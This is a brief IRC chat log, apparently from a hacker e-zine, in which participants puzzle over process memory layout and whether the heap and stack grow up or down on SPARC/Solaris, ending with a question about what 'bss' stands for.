[11:54:17] yeah at least I think it is :) [11:54:29] crazy bread [11:54:47] the diagram i got says runtime memory organization is text, data,bss, heap, stack [11:54:48] :/ [11:54:55] where did br00t ho [11:54:56] go [11:55:23] ill ask esdee [11:55:28] ok [11:56:25] nah its the first datagram [11:56:26] you were right [11:57:12] coo [11:57:14] where is esdee [11:57:40] msn [11:57:40] :P [11:58:13] i8 [11:58:35] but the first one was right [12:02:43] ok [12:02:57] ask esdee which architectures turn heap and stack up the other way [12:03:02] i think its only sparc [12:05:49] he says that on Solaris the heap gets mapped at a 0x4000 address [12:06:02] and the stack on an address like 0xfffe0000 [12:06:29] heh crazy [12:06:39] which way do they grow though [12:06:53] does sparc stack grow from 0xffffe0000 down to 0xffffffff [12:06:55] or up [12:07:03] and same with heap [12:11:31] I've asked him [12:11:57] hmm so1o [12:12:10] it grows up [12:12:39] it being the stack [12:12:44] I have to be afk now [12:12:49] gonna buy diablo [12:12:51] bbiab [12:15:24] hm [12:15:31] maybe its the heap that grows the other way [12:15:37] i just remember horizon talking ages ago [12:15:46] about how sparc fucks with his head sometimes Please email me if you find out the answer to this one! [12:36:19] when talking about text and bss segment [12:36:20] s [12:36:27] what does bss stand for? |=[ EOF ]=---------------------------------------------------------------=|